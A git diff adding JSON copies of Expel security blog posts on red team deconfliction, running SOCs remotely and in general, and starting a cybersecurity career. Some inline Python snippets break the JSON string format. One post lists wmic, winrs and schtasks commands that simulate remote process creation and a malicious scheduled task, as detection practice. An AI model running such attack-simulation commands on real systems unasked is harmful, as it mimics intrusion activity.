Will you let them know it\u2019s an authorized red team? There\u2019s many theories to appropriately assess the response to a red team. Some organizations prefer not to tell their defenders, some prefer to operate more openly in the purple team model. In any regard, there will be a moment between detection of the initial threat and the recognition that this is authorized red team activity that you\u2019ll want to plan for. Your SOC will think this is a real threat, and your playbooks for a real threat will (hopefully) be followed. Consider that when you make the decision to include/exclude knowledge of the assessment from key stakeholders in your security organization. One way to think about this is: \u201cat 2am who/how many will be woken up to respond, and how soon in our IR plan do things become a risk to the business?\u201d Our take: The more people in the know, the better. Don\u2019t gas the team responding to an authorized assessment. Save some capacity and energy for the real thing (we\u2019ve seen the real thing happen at the same time as the assessment). 5. Chat with your MSSP/MDR Use an MSSP or MDR? Chat with them. Understand rules of the road for responding to red team activity. It\u2019s likely one of your red team goals includes assessing your MSSP/MDR. That\u2019s great! But understand what you can expect before you get started. At Expel, we like to treat red team engagements as a real threat to exercise our analysts\u2019 investigative muscle, and also showcase our response process. This helps build confidence between us and our customers. It also helps them understand how we will communicate with them (slack, email, PagerDuty) when there\u2019s an incident in their environment. Additionally, this also showcases our analysts\u2019 investigative mindset, including a full report to show the detail of our response and the thoroughness of our investigation. Now, as mentioned above there\u2019s a cost to responding to a red team exercise. Response is time-consuming and analyst resources are extremely valuable. We believe that showcasing the initial response is important, and the extended response can wait. That means if a red team is detected and confirmed at 2am, let everyone go back to bed and pick up the response during normal business hours. For red team response, we operate M-F 9am-5pm and will continue to chase new leads for two business days before delivering a final report. That report is comprehensive, and includes everything our normal critical response would contain, but everyone is much happier at the end of the day when our off-hour energy is saved for the real thing. 6. Have a bat phone to the red team Your MDR or SOC just spotted activity they believe is the red team. Prove it with evidence. Don\u2019t assume! Call them. Show them. Verify it\u2019s the red team using evidence. You would be surprised at how often the lines get crossed when the actions taken during an assessment don\u2019t necessarily line up with what was documented/in-scope. However, the quicker these actions can be confirmed, the happier everyone is when they aren\u2019t related to the actions of an actual threat. Most SOCs will not stand down until this is confirmed, and we\u2019ve sometimes waited more than 12 hours to get confirmation that something we identified is related to an authorized test. That\u2019s a lot of energy expended on both ends. Have cell phone numbers, Zoom bridges, etc. before you get started. Always have a deconfliction process on-hand prior to launching the assessment. 
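To make that deconfliction call faster, it helps to keep the red team's documented scope (source IPs, accounts, test window) somewhere responders can check against in seconds. Here is a minimal sketch of that idea; the scope values are invented, and a match is only a reason to pick up the bat phone, never a reason to stand down on its own.

```python
from datetime import datetime, timezone

# Hypothetical rules-of-engagement scope agreed with the red team before the test.
RED_TEAM_SCOPE = {
    "source_ips": {"203.0.113.10", "203.0.113.11"},
    "accounts": {"svc_redteam", "jdoe_test"},
    "window": (datetime(2020, 7, 6, tzinfo=timezone.utc),
               datetime(2020, 7, 10, tzinfo=timezone.utc)),
}

def possibly_red_team(source_ip: str, account: str, seen_at: datetime) -> bool:
    """True if the observed activity falls inside the documented scope."""
    start, end = RED_TEAM_SCOPE["window"]
    return (source_ip in RED_TEAM_SCOPE["source_ips"]
            and account in RED_TEAM_SCOPE["accounts"]
            and start <= seen_at <= end)

if __name__ == "__main__":
    in_scope = possibly_red_team("203.0.113.10", "svc_redteam",
                                 datetime(2020, 7, 8, 2, 0, tzinfo=timezone.utc))
    print("In documented scope -- call the red team to confirm" if in_scope
          else "Out of scope -- treat it as a real threat")
```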
This will save a lot of your team\u2019s time and energy when the red team gets in. Parting thoughts Red team assessments come in all shapes and sizes, and we believe that they are essential for understanding not only the security posture of an organization\u2019s overall response readiness. If you\u2019re in a position to influence how a red team assessment is organized, we encourage you to talk about these points not only internally but with the red team you have chosen to carry out the assessment as well as the SOC/MSSP/MDR you will be relying on for defense. Some quick planning and expectation setting can prevent a lot of pain and create an overall better engagement for everyone involved!" +} \ No newline at end of file diff --git a/7-habits-of-highly-effective-remote-socs-expel.json b/7-habits-of-highly-effective-remote-socs-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..ef80d3ded961f0512bd4fd0eafb5d55c48aec0de --- /dev/null +++ b/7-habits-of-highly-effective-remote-socs-expel.json @@ -0,0 +1,6 @@ +{ + "title": "7 habits of highly effective (remote) SOCs - Expel", + "url": "https://expel.com/blog/seven-habits-highly-effective-remote-socs/", + "date": "Mar 25, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG 7 habits of highly effective (remote) SOCs Security operations \u00b7 5 MIN READ \u00b7 JON HENCINSKI \u00b7 MAR 25, 2020 \u00b7 TAGS: Employee retention / Managed detection and response / SOC Last week, along with many other businesses, we moved to 100 percent remote work as a company. That included our 24\u00d77 SOC. Expel\u2019s CEO and co-founder, Merk, shared his thoughts on some of the things he witnessed during our shift to an all remote workforce, but I wanted to share some of the changes we made to keep our SOC highly effective in this new setup. Security operations is a team sport at Expel. One of our SOC guiding principles is this: teamwork makes the dream work. It\u2019s simple: great outcomes happen when people work together . But as of last week, our SOC analysts are no longer sitting together. It\u2019s a change I knew that would require us to adapt a bit. Because in order to maintain the texture of the team in a completely remote setting we\u2019d need to commit to a new set of daily habits \u2013 seven in fact, to keep our (remote) SOC highly effective. To be candid: It\u2019s a big change for us and we\u2019re still adjusting. You may be going through something similar right now too. Or you and your SOC team may consider yourselves veterans of an all-remote setting. That\u2019s great too. Now we\u2019re all in the same boat. We\u2019ll share what\u2019s worked for us (so far) and we\u2019d love to hear what\u2019s worked for you too. 1. Prioritize video conferencing Workplace camaraderie and trust are key ingredients of an effective SOC. Trust brings safety and camaraderie adds a sense of \u201ctogetherness.\u201d We trust each other to operate in the best interest of achieving our goal (protecting our customers and helping them improve) and to work with a \u201cwe\u2019re in this together\u201d mentality. We need to maintain and nurture these key ingredients in an all-remote setting. But how? Queue the SOC party line. The SOC party line is the name of our Zoom meeting that\u2019s open 24\u00d77 for the team. Instead of walking onto the SOC floor, our analysts start their day by joining this Zoom meeting. While we\u2019re no longer able to sit next to each other we can be with each other. It matters. 
We\u2019re emulating the texture of the SOC floor by staying connected via Zoom and maintaining our sense of \u201ctogetherness.\u201d And yes, there\u2019s an endless pursuit to find a funny Zoom virtual background . (Side note: Security is serious business. We have the privilege of helping organizations manage risk. We take our work very seriously but don\u2019t take ourselves too seriously. It\u2019s okay to find the bad guys and have fun while doing it.) 2. When in pursuit: To the breakout room! While our 24\u00d77 Zoom meeting, aka the SOC party line, emulates the SOC floor and brings us together, pursuing threats and coordinating response in this main Zoom meeting wouldn\u2019t yield the precise, coordinated response we\u2019re seeking. Too many cooks in the kitchen. Instead, as work enters the system and the team spots activity that warrants investigation or follow-up, the lead investigator spins up a Zoom breakout room and invites the necessary resources required to run the item to ground. As an individual contributor you\u2019re provided with a virtual conference room with a clear goal and objective. As a manager, you have a clear understanding of current utilization based on the number of folks in the main Zoom room versus breakout rooms. You\u2019re enabling a highly coordinated response and have a clear line of sight on capacity. A win-win. 3. Emphasize empathy Empathy is a core competency for leaders. I personally believe that no other skill makes a bigger difference than empathy when it comes to leadership. Simon Sinek agrees with me on this one. And now more than ever, during these stressful times, we need to emphasize empathy. We\u2019re all going through something significant right now. It\u2019s okay to acknowledge that and talk about it with one another. As a SOC management team, we\u2019re spending more time with our people, not less. And most of our 1:1s right now are centered around how our folks are doing and what else we could be doing to set them up for success in this all-remote setting. We listen really hard and most importantly we let them know we\u2019ve got their back. Pro tip: Empathy builds trust. And as you already know, trust is a key ingredient to an effective SOC. 4. Be transparent about quality We\u2019re doing everything we can to make our shift to a remote SOC seamless for the team. But we\u2019re also being super transparent about the quality of our work output. Has our quality gone down as a result of this change? I wrote about our SOC quality program in a previous post , but as a quick recap: we use a quality control (QC) standard, Acceptable Quality Limits (AQL), to tell us how many alerts and incidents we should review each day. We then randomly select a number (based on AQL) of alerts, investigations and incidents and review them using a check sheet. We send the results to the team using a Slack workflow . Here\u2019s an example: Reviewing the results with the team lets us know how we\u2019re doing. It lets us know where we\u2019re having problems so we can adjust and improve. And no, we never expect perfection. 5. Over-communicate This one is a bit obvious but it\u2019s worth stating. Since we\u2019re no longer working alongside each other, effective communication is crucial. And working in an all-remote setup may mean more distractions for some folks, not less. We\u2019re emphasizing empathy and listening really hard to learn what these distractions are for the team and landed on the need to over-communicate . 
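(A quick aside on the QC sampling mentioned a moment ago: here is roughly what that looks like in practice, as a toy sketch. The sample size is a placeholder; in a real program an AQL table derives it from your daily alert volume and the quality limit you have chosen.)

```python
import random

def pick_qc_sample(closed_alert_ids, sample_size=13):
    """Randomly select some of yesterday's closed alerts for check-sheet review."""
    return random.sample(closed_alert_ids, min(sample_size, len(closed_alert_ids)))

def passes_check_sheet(alert_id):
    """Placeholder for the human review step."""
    return True

if __name__ == "__main__":
    yesterdays_alerts = ["alert-%d" % n for n in range(1, 251)]  # pretend lot of 250
    sample = pick_qc_sample(yesterdays_alerts)
    failures = [a for a in sample if not passes_check_sheet(a)]
    print("Reviewed %d of %d alerts; %d failed the check sheet"
          % (len(sample), len(yesterdays_alerts), len(failures)))
```

Okay, back to over-communicating.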
Repeat important messages in team meetings and 1:1s. In our SOC, \u201cI don\u2019t know\u201d or \u201cI\u2019m having difficulty understanding that\u201d is always an acceptable answer to a question (If you\u2019re not testing for candor in your interview process you totally should be, by the way). Bottom line: remote work may mean more distractions. Over-communicate like your team depends on it. 6. Seek out fun In these stressful times, not only is it okay to have fun \u2026 but you should seek it out for your team. We\u2019re still finding our way here a bit, but we\u2019ve experimented with happy hours, coffee breaks and book clubs all over Zoom (don\u2019t worry, we\u2019re always watching). The digital happy hour has been the biggest hit so far but we\u2019re still coming up with new ideas. If you don\u2019t have Zoom, Skype, Google Hangouts, FaceTime and Facebook messenger are all good alternatives. Seeking out fun for your team is a great way to take care of them. You\u2019ll reduce stress and build camaraderie. 7. Test, learn, iterate Completely remote work may be our new normal for a while. Do I think the adjustments we\u2019ve made are all of the right moves? Nope. But we\u2019ll continue to test new things, learn from our mistakes and iterate our way to an even more successful remote setup. We\u2019re never afraid to ask: Is there a better way to do this? We\u2019re always trying to learn and improve. Parting words We\u2019re still getting adjusted to our all-remote setup but we\u2019ve landed on some things that work and wanted to share them with you. We\u2019ll continue to learn and improve, as we always do, but I\u2019d love to hear from you if there are daily habits you and your team practice that make your remote SOC highly effective. Finally, we\u2019re all going through something significant right now. It\u2019s okay to acknowledge that and talk about it. Emphasize empathy with your team and the people around you. Listen really hard. Prioritize effective communication. Over-communicate. And try to have a little fun while doing it." +} \ No newline at end of file diff --git a/7-habits-of-highly-effective-socs.json b/7-habits-of-highly-effective-socs.json new file mode 100644 index 0000000000000000000000000000000000000000..6a5e292161e639b2fc0866beb01fdeb71faebe40 --- /dev/null +++ b/7-habits-of-highly-effective-socs.json @@ -0,0 +1,6 @@ +{ + "title": "7 habits of highly effective SOCs", + "url": "https://expel.com/blog/7-habits-highly-effective-socs/", + "date": "Nov 5, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG 7 habits of highly effective SOCs Talent \u00b7 6 MIN READ \u00b7 JON HENCINSKI \u00b7 NOV 5, 2019 \u00b7 TAGS: Employee retention / Managed detection and response / Managed security / Planning / SOC Before I talk about effective SOCs that run like well-oiled machines, let\u2019s get one thing straight. SOC isn\u2019t a dirty word. But I totally understand the negative connotation and that\u2019s exactly why I\u2019m writing this post. Alert fatigue is real , repetition leads to exhaustion and those two things in tandem create an environment ripe for analyst burnout . I get it. Here\u2019s the thing: When built right, a job working in a SOC can be so much fun, not to mention you get the learning and experience you thought you signed up for. 
Since launching our 24\u00d77 service almost two years ago we\u2019ve experimented a ton, learned a bunch, and through a lot of iteration landed on some habits \u2014 seven, in fact \u2014 that we believe help us \u201cSOC\u201d the right way at Expel. If you\u2019re working in or managing a SOC with a ton of turnover \u2014 or just want tips on how to shape an effective and more productive team \u2014 here are seven habits to adopt right now. 1. Have a clear mission and guiding principles Get explicit about the mission and your culture. At Expel, the SOC\u2019s mission is to protect our customers and help them improve. The mission is centered around problem solving and being a strategic partner for our customers. Notice that there are zero mentions of looking at as many security blinky lights as possible. That\u2019s intentional. Take it a step further and create some guiding principles. Guiding principles define what you as a team believe in and how you operate together. Here are some (but not all) of the guiding principles in the Expel SOC: Teamwork makes the dream work. Service with passion is our competitive advantage. We embrace positive change. Articulating guiding principles is the first step in creating a SOC culture that you can turn into your competitive advantage. Security tech and process are easily replicated but culture is hard to copy. 2. Prioritize learning Our analysts love to learn new things; it\u2019s even one of the traits we hire for. One thing that we\u2019ve learned in building out our program is that the best way to foster improvement is to combine this love of learning with a collaborative \u2014 not adversarial \u2014 approach. The best example of this is how we use attack simulations to help our team learn new techniques. During these, we have to celebrate progress and opportunities to learn \u2014 it doesn\u2019t take much to make someone feel foolish and have that metastasize into a reluctance to try a new thing or stretch a new skill. If you don\u2019t run attack simulations regularly, start building them into your schedule. But don\u2019t overthink it. You can run one right now in eight simple steps: Talk to the team and given them background so they don\u2019t feel ambushed. Open a PowerShell console. Run wmic /node:localhost process call create \u201ccmd.exe /c notepad\u201d from your PowerShell console to simulate remote process creation using WMI. Run winrs:localhost \u201ccmd.exe /c calc\u201d from your PowerShell console to simulate remote process creation using WinRm. Finally run schtasks /create /tn legit /sc daily /tr c:users appdatalegit.exe to simulate the creation of a malicious Windows scheduled task. Interrogate your SIEM and EDR. Talk about it as a team. Find ways to improve. Want to run more sophisticated simulations? Here\u2019s our threat emulation framework along with an example of how to simulate an incident in AWS . 3. Empower the team Analysts want to spend time finding new things, pursuing quality leads and working with people to solve complex problems \u2014 not chasing the same false positive over and over again. Trust the team to filter out the noise and then enable them to do so. How did we build this capability at Expel? We took the DevOps processes used by our engineering teams and adapted them to detection deployment. Here\u2019s a high-level overview of what this looks like: We manage our detection rules using GitHub . We have unit tests for every detection (just like you would expect of code). 
We use CircleCi to build our detection packages. During the CircleCi build process, we apply linting and perform additional error checking. If a CircleCi build fails we\u2019ll automatically fail the PR so an analyst knows some additional tweaks are required. We create error codes that are easy to understand. We use Ansible to deploy new detection packages. Now an analyst can deploy a new detection package at any time as long as the content passes automated tests and has been peer-reviewed. Here\u2019s how this plays out in practice. @subtee just tweeted about a new remote process execution technique \u2026 An analyst creates the rule in GitHub and submits a new PR. That PR is picked up by CircleCi, linted and checked for errors. Assuming all goes well, the PR is marked as \u201call checks passed.\u201d The analyst requests peer review. The detection package is deployed using Ansible. Everyone\u2019s happy. Empower the team to tackle false positives and write rules to find new things. Give them control of the end-to-end system and back them up with good error checking. In doing so, your team members will feel more connected to their work and the mission. 4. Automate SOC work can be repetitive. Automation FTW! But what should you automate? Decision support is a great place to start. What\u2019s decision support? In our context, decision support is all of the automation, contextual enrichment and user interface attributes that make our analysts more effective in answering the following question: \u201cIs this a thing?\u201d How does this play out at Expel? As part of our integration with Office 365 we collect signal and generate alerts when accounts are compromised or user activity doesn\u2019t seem quite right. Investigating patterns of user authentication behavior can be a tedious task when done manually \u2026 but the good news is that it\u2019s a series of repeated steps that can be automated. Take a look at this example where, with the help of some automation, we\u2019re able to quickly review 30 days of login activity based on IP address and user-agent combinations: Automate the repetitive tasks so the team can focus their efforts on making important decisions versus clicking buttons. 5. Use a capacity model Understand your available capacity (AKA analyst hours) and utilization. Are you consistently exceeding your available capacity? Is there always way more work to do than your people can handle? If so, cue the burnout. If capacity modeling is new to you, that\u2019s okay. There are plenty of resources available to help get you started. Bottom line: Know your capacity utilization. If you discover that your team is oversubscribed, you\u2019ll need to act fast. 6. Perform time series analysis I agree with Yanek\u2019s philosophy here. Effective managers are able to look out into the future and, with reasonable certainty, predict what needs to change today . I think effective management is centered around asking the right questions and using data to answer them. You already know that alert fatigue leads to burnout. As a manager, I ask a ton of questions about the alert management process: How many alerts did we send to the team last month? How many alerts will we send to the team next month? What day of the week is the busiest? Do we get more alerts during the day or at night? How many alerts will we send to the team next year? All of these questions are centered around time . 
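Here is a deliberately tiny sketch of the kind of analysis that helps answer those questions: splitting historical alert counts into a trend (via a moving average) and a day-of-week pattern. The counts below are invented, and a real implementation would run on your actual alert data with something like pandas or statsmodels rather than the standard library.

```python
from statistics import mean

# Three invented weeks of daily alert counts, Monday through Sunday.
alerts = [120, 135, 128, 140, 150, 60, 55,
          125, 138, 132, 145, 155, 62, 58,
          130, 142, 136, 150, 160, 65, 61]

# Trend: a 7-day moving average smooths out the weekly cycle.
trend = [round(mean(alerts[i:i + 7]), 1) for i in range(len(alerts) - 6)]

# Seasonality: average volume per weekday (index 0 = Monday).
weekday_avg = [mean(alerts[d::7]) for d in range(7)]

print("Overall daily average:", round(mean(alerts), 1))
print("Busiest weekday index:", weekday_avg.index(max(weekday_avg)))
print("Weekend daily average:", round(mean(weekday_avg[5:]), 1))
print("Trend (7-day moving average):", trend)
```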
Time series analysis allows you to analyze data in order to learn what happened in the past, and to inform you on what things will likely look like in the future. By performing time series analysis you can forecast how things will change and react before it\u2019s too late. We perform time series analysis on the historical volume of alerts sent to our team for triage. From this data, we pull out different components including trend , seasonality , and the noise AKA \u201c the residual ,\u201d so that we can use patterns from historical behavior to help us predict future behavior. This allows us to not only more deeply analyze what\u2019s already happened, but it\u2019s also a way to look into the future so you can start to react now before it\u2019s too late. 7. Measure quality I love this tweet. Quality control doesn\u2019t get in the way. It pushes you forward. At Expel, we use a quality control (QC) standard, Acceptable Quality Limits (AQL), to tell us how many alerts and incidents we should review each day. We then randomly select a number (based on AQL) of alerts, investigations and incidents and review them using a check sheet . QC allows us to spot problems, understand them and then fix them. And fast. Parting words I\u2019ll be candid. At one point I thought about rebranding our SOC as a Computer Incident Response Team (CIRT) to distance ourselves from all the general negativity associated with a SOC. But a SOC can be a great place to work if you solve problems the right way and empower your teams. As an industry, let\u2019s \u201cSOC\u201d the right way and reshape everyone\u2019s thinking about SOCs." +} \ No newline at end of file diff --git a/a-beginner-s-guide-to-getting-started-in-cybersecurity.json b/a-beginner-s-guide-to-getting-started-in-cybersecurity.json new file mode 100644 index 0000000000000000000000000000000000000000..5397752471a20f2da9318994b122c32031b2ed5e --- /dev/null +++ b/a-beginner-s-guide-to-getting-started-in-cybersecurity.json @@ -0,0 +1,6 @@ +{ + "title": "A beginner's guide to getting started in cybersecurity", + "url": "https://expel.com/blog/a-beginners-guide-to-getting-started-in-cybersecurity/", + "date": "May 31, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG A beginner\u2019s guide to getting started in cybersecurity Talent \u00b7 9 MIN READ \u00b7 YANEK KORFF, BEN BRIGIDA AND JON HENCINSKI \u00b7 MAY 31, 2018 \u00b7 TAGS: Career / Guide / How to / NIST It happens from time to time. Someone tweets something incendiary, it creates a hubbub and before long you\u2019ve got yourself a veritable online brouhaha. One topic that seems to have piqued everyone\u2019s interest lately is this question: is there such a thing as an entry-level security job? It\u2019s a good one. And there seem to be two schools of thought: Never start off in security. Start with IT infrastructure, helpdesk, or development. Don\u2019t waste time, dive into security and fill in the technical gaps as you go. Here at Expel, we agree with Dino\u2019s philosophy . First of all, start anywhere you damn well want to start. \u201cFocus on what you want to do , versus what you want to be . Then, focus on finding the best place to do that and stay there.\u201d We\u2019ve seen it first hand. 
We\u2019ve hired several analysts straight out of college, and they\u2019re doing excellent work (If you\u2019re an employer and not plugged into the community at the Rochester Institute of Technology , and specifically working with their Computer Security program, you\u2019re definitely missing out). So we know there are degree programs out there that will prepare you for security jobs right off the bat. Now that you know where we stand, we\u2019ve got some tips on how to break into security . But there are lots of different jobs with the title \u201csecurity\u201d in them (and lots of jobs involving security that don\u2019t have \u201csecurity\u201d in the title) so it\u2019ll be important to make sure we know which ones we\u2019re talking about. Which cybersecurity jobs are we talking about? Wouldn\u2019t you know it, not only does NIST have a pretty great cybersecurity framework to help you manage risk , they\u2019ve also got another nice framework that can help job seekers figure out what employers are looking for. A good first step towards finding the work you want to do is to identify the tasks that float your boat and map them to jobs that give you the opportunity to do just that. Worried you don\u2019t have the technical depth for some of these roles? Entirely possible! If you drill into the framework a bit you\u2019ll see some jobs (like Cyber Defense Analysis , which we call a \u201cSOC Analyst\u201d) have an enormously long list of knowledge areas you\u2019ll need to be proficient in. If that\u2019s the kind of job you want to do, it might make sense to start off with a less technically demanding role that has a lot of the same baseline prerequisites like an IT Program Auditor . You could use that as a stepping stone into other security roles as you develop a deeper understanding of the security space. And yes, you could certainly start with a role in Systems Administration or Network Operations to gain technical chops too. \u201cWait a sec,\u201d you might be thinking to yourself, \u201cisn\u2019t this just a cop out by defining non-security roles as security?\u201d Yes, it absolutely is. You got us. Frankly, as the NICE Framework makes clear, security is extraordinarily broad. While some argue it\u2019s \u201cniche,\u201d it\u2019s really a compendium of niche knowledge across several vastly different work areas. That means if your mind (or your heart) is set on security, you can enter any of these domains and work your way into security. Or \u2026 you can start in security-specific domains and work your way into more technical roles over time. Okay, so maybe you buy into the argument that the security domain is pretty diverse. Maybe you go one step farther and believe several of these roles include security responsibility even if they don\u2019t have \u201csecurity\u201d in their title. After all, we\u2019ve been saying that security needs to be built-in , not a bolt-on for years, right? Perhaps what\u2019s going on here is that the online brouhaha around \u201centry-level security jobs\u201d is really focused on the security jobs where technical depth is essential. Maybe the argument is it\u2019s these jobs that require starting out in technical non-security roles first. Let\u2019s poke at that a bit. But first, there are a few things that\u2019ll apply no matter what direction you\u2019re coming from. Let\u2019s try to agree on three things Anyone can cook Have you seen the movie Ratatouille ? No? Yeah, that seems to be the most common answer. 
Ok, let\u2019s summarize [SPOILER ALERT]. There\u2019s this Chef, Auguste Gusteau, who authors \u201c Anyone Can Cook .\u201d Throughout the movie, you\u2019re made to believe that the message of the book (and the movie) is that literally anyone can become a great chef. Even the protagonist, a rat, can do it because you can learn how to do it from a book. Yet, by the end of the movie, you realize the point is substantially more profound and realistic. Actually, no. Not everyone who picks up the book can become a great chef. But, in fact, a great chef could potentially come from anywhere. There are so many paths to \u201csuccess.\u201d There are exceptions to every rule. Anyone can cyber. \u201cNever\u201d is rarely the right word A few years ago one of us was walking up Main Street, USA at the Magic Kingdom. It was 8:30am and he refused to buy his younger daughter funnel cake first (oh, the humanity!) \u201cYou never buy me anything!\u201d she exclaimed. He stopped. He looked around. He kept walking. The notion that you should avoid absolutes isn\u2019t new. And in the tech space, it\u2019s particularly important. A great engineer and former colleague once said: \u201cWhen the customer says it never happens, we need to build support for it to happen 5-10% of the time.\u201d So we\u2019re going to be cautious about these words when we\u2019re talking about career paths too. Broad-scale discouragement is a Bad Thing\u2122 When you engage in an argument or even a mild discussion, there\u2019s a decent chance your conversation partner is already coming to the table with an opinion. If it\u2019s a strongly-held opinion, your counter-argument may actually galvanize their original belief . In that case, your discouragement is going to fall on deaf ears \u2026 so why bother? In other cases, people may have a more flexible mindset. Think about a scout versus a soldier mindset. To a soldier, everything is black and white. Good and evil. Kill or be killed. Compare that to a scout, who\u2019s in information gathering mode all the time. Drawing conclusions are some general\u2019s job. Discouragement, in this case, could actually be effective! So good job, you\u2019ve managed to discourage a portion of the population who could actually have been amazing contributors in the field. What harm is there on succeeding or failing on one\u2019s own merit? Why encourage people to punt on first? Five habits that are helpful for (entry-level) security jobs If you don\u2019t agree with the three items above, well \u2026 it might be a good idea to stop reading now because we\u2019re about to do some hardcore encouragement , and that might make you grumpy. After all, the next great information security practitioner could be reading this blog right now. Also, we promised in the title to explain how to get into cybersecurity. So here are a few practical next steps. There are all sorts of resources out there that\u2019ll help you on the path towards becoming a super-nerdy cyber superhero. Here\u2019s our list of five things you can do to take the first steps to an entry-level technical cybersecurity career. 1. Survey the field Follow influential cybersecurity evangelists on Twitter. The most successful ones probably aren\u2019t calling themselves cybersecurity evangelists. They\u2019re just constantly dropping knowledge bombs, tips and tricks that can help your career. 
Here\u2019s a short list to get you going: @bammv , @cyb3rops , @InfoSecSherpa , @InfoSystir , @JohnLaTwC , @armitagehacker , @danielhbohannon , @_devonkerr_ , @enigma0x3 , @gentilkiwi , @hacks4pancakes , @hasherezade , @indi303 , @jackcr , @jenrweedon , @jepayneMSFT , @jessysaurusrex , @k8em0 , @lnxdork , @mattifestation , @mubix , @pwnallthethings , @pyrrhl , @RobertMLee , @ryankaz42 , @_sn0ww , @sroberts , @spacerog , @subtee , @taosecurity 2. Combine reading and practice This may shock you, but there\u2019s this security company called Expel that has a bunch of great content (full disclosure: we\u2019re biased). Self-serving comments aside, there are several companies that produce high-value security content on a pretty regular basis. High on our list are CrowdStrike , Endgame , FireEye , Kaspersky , Palo Alto\u2019s Unit 42 , and TrendLabs . As you read, try to figure out how you\u2019d go about detecting the activity they describe. Then, how would you investigate it ? Are you looking to grow your technical foundation for something like an analyst role? The breadth of what you need to know can be daunting. Perhaps the most foundational knowledge to pick up is around the TCP/IP protocol suite . Be prepared to answer the \u201c what happens when \u201d question confidently. For learning about endpoint forensics, you probably can\u2019t get a better foundation than Incident Response and Computer Forensics 3rd Edition . The chapter on Windows forensics is gold. Dive into Powershell , associated attack frameworks , and learn how to increase visibility into PowerShell activity with logging. Pair this knowledge with some of the best free training out there at Cobalt Strike. Watch the (most excellent) videos and apply the concepts you\u2019ve learned as part of Cobalt Strike\u2019s 21-day trial. Not enough time? Consider making the investment. The Blue Team Field Manual and Red Team Field Manual round out our recommendations on this front. In parallel, set up a lab with Windows 7 (or later) workstations joined to a domain. Compromise the workstation using some of the easier techniques, then explore post exploitation activity. Your goal is to get a feel for both the attack and defense sides of the aisle here. On the network side, consider The Practice of Network Security Monitoring , Practical Packet Analysis , and Applied Network Security Monitoring . When it comes time to take some of this book learning and make it real, resources like the malware traffic analysis blog and browsing PacketTotal where you can get a sense for what\u2019s \u201cnormal\u201d versus what\u2019s not. Your goal here should be to understand sources of data (network evidence) that can be used to detect and explain the activity. To refine your investigative processes on the network, consider Security Onion . Set up some network sensors, monitor traffic and create some Snort/Suricata signatures to alert on offending traffic. Your goal is to establish a basic investigative process and like on the endpoint side, understand both the attack and defense sides of the equation. 3. Seek deep learning, not just reading Have you ever taken a class and then months later tried to use the knowledge you allegedly learned only to discover you\u2019ve forgotten all the important stuff? Yeah, if you disconnect learning from using the knowledge, you\u2019re going to be in a hard spot. This might be one of the biggest challenges in diving into a more technical security role up front. 
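One cheap way to keep that knowledge in use is to make the reading runnable. For example, the "what happens when you visit a website" question above boils down to a few lines you can execute and then watch on the wire. A minimal sketch using only the Python standard library; example.com is just a placeholder host.

```python
import socket

host = "example.com"  # any site you are allowed to poke at

# 1. DNS: resolve the name to an IP address.
ip = socket.gethostbyname(host)
print("DNS:", host, "resolves to", ip)

# 2. TCP: complete the three-way handshake to port 80.
with socket.create_connection((ip, 80), timeout=5) as sock:
    print("TCP: connected from", sock.getsockname(), "to", sock.getpeername())

    # 3. HTTP: send a minimal request and read back the status line.
    sock.sendall(b"HEAD / HTTP/1.1\r\nHost: " + host.encode() + b"\r\nConnection: close\r\n\r\n")
    print("HTTP:", sock.recv(64).split(b"\r\n")[0].decode())
```

Run it, capture the same exchange with tcpdump or Wireshark, and explain each step out loud. Hands-on repetition helps, but it only gets you part of the way.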
To help offset this, in addition to combining reading with practice, consider the Feynman technique . Never heard of it? Well, it\u2019s easy to skim over bits and pieces you don\u2019t understand \u2026 but if you can distill it down into simple language such that others could understand it, then you\u2019ll have understood it better in the process. Nothing helps you learn quite like teaching. 4. Develop a malicious mindset Years ago, a security practitioner was explaining how you can become a better defender by thinking like an adversary. The story came with some awkward (and humorous) interchanges. He walked into a hotel room with his family while on vacation, saw the unsecured dispenser installed into the shower wall and said out loud, \u201cWow, it would be so easy to replace the shampoo with Nair!\u201d His family was horrified. To be clear: we\u2019re not advocating that you replace shampoo with Nair, or similarly nefarious anti-hair products. And the concept of thinking like an attacker is not new. Eight years ago when Lance Cottrell was asked what makes a good cybersecurity professional, he said they put \u201cthemselves in the shoes of the attacker and look at the network as the enemy would look at the network and then think about how to protect it.\u201d The best way to do that these days is by wrapping your head around the MITRE ATT&CK framework . It\u2019s quickly becoming the go-to model for wrapping some structure around developing an investigative process and understanding where (and how) you can apply detection and investigation. You might want to familiarize yourself with it prior to doing extensive reading and then come back to it from time to time as needed. 5. Be dauntless Don\u2019t let your lack of knowledge stop you . There are organizations out there willing to invest in people with the right traits and a desire to learn. Apply for the job , even if you don\u2019t think you\u2019re qualified. Maybe you get a no. So what? Try again at a different company. Or try again at that same company later. Reading will only get you so far \u2026 applying your knowledge will get you to the next level. And guess what, remember that Feynman technique? Yeah, teaching that knowledge you\u2019ve acquired to others will get you one level farther. Good luck, happy hunting! Finally \u2026 to those who say \u201can IT background and deep technical skills will help you get a job in security,\u201d we say: \u201cWe agree!\u201d And \u2026 To those you say \u201csecurity roles can be broad and you can use them to develop technical expertise over time,\u201d we say: \u201cWe also agree!\u201d What we don\u2019t believe in is telling people we don\u2019t know that they can\u2019t do something without understanding their unique situation. There may be paths that are generally easier, or generally harder. But assuming you can\u2019t do something is headwind you don\u2019t need. Hopefully you\u2019ve found some guidance here that gives you the push you need to consider an entry-level (or later) security job and you\u2019ll apply. To that end, we say \u2026 best of luck!" 
